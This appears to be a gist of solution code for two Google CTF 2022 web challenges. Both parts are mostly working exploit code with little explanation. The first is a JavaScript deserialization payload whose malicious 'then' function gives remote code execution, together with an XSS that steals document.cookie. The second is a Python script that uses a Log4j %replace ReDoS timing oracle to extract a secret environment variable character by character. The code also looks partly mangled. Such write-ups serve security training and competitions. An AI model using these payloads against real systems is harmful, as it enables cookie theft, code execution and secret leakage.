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Created July 4, 2022 12:23
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Google Capture The Flag 2022 / HORKOS & LOG4J2
Google Capture The Flag 2022
web / HORKOS
10 solves, 363 pts
// RCE with a thenable object -> XSS
const XSS =
'<img src=0 onerror="location = `${document.cookie}`">';
const evil = [
key: "cart",
type: "pickledShoppingCart",
value: [
key: "items",
type: "pickledObject",
value: [
key: [XSS],
type: "pickledItem",
value: [
key: "price",
type: "Number",
value: 0,
key: "quantity",
type: "String",
value: "0",
key: "address",
type: "pickledAddress",
value: [
key: "street",
type: "String",
value: "",
key: "number",
type: "Number",
value: 0,
key: "zip",
type: "Number",
value: 0,
key: "shoppingCartId",
type: "Number",
value: 0,
key: "driver",
type: "pickledDriver",
value: [
key: "username",
type: "String",
value: "onagbike",
key: "orders",
type: "pickledArray",
value: [],
key: "orderId",
type: "Number",
value: 0,
const cart = [
key: "0",
type: "pickledShoppingCart",
value: [
key: "items",
type: "pickledObject",
value: [],
key: "address",
type: "pickledAddress",
value: [
{ key: "street", type: "String", value: "" },
{ key: "number", type: "Number", value: 0 },
{ key: "zip", type: "Number", value: 0 },
key: "shoppingCartId",
type: "pickledObject",
value: [
key: "then",
type: "Function",
value: `orders.push(${JSON.stringify(evil)}); arguments[0]()`,
window.checkout = () => {
document.getElementById("cart").value = JSON.stringify(cart);
# Google Capture The Flag 2022
# web / LOG4J2
# 43 solves, 218 pts
# ReDoS makes a time-based oracle to judge a prefix.
import httpx
import string
# BASE_URL = "http://localhost:3000"
CHARS = string.ascii_letters + string.digits + "_-"
TEMPLATE = '%replace{${env:FLAG}}{^{{PREFIX}}|^.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.............................................................................................................................................................................................................................................................................................................................................................................................................................@}{hit}'
prefix = "CTF."
while True:
ng = 0
ok = len(CHARS) + 1
while ok - ng > 1:
mid = (ok + ng) // 2
payload = TEMPLATE.replace("{{PREFIX}}", prefix + f"[${CHARS[0:mid]}]")
"text": payload,
ok = mid
except httpx.TimeoutException:
ng = mid
if ok == len(CHARS) + 1:
prefix = prefix.replace(".", "{") + "}"
prefix += CHARS[ok - 1]
print("flag: " + prefix) # => flag: CTF{and-you-thought-it-was-over-didnt-you}
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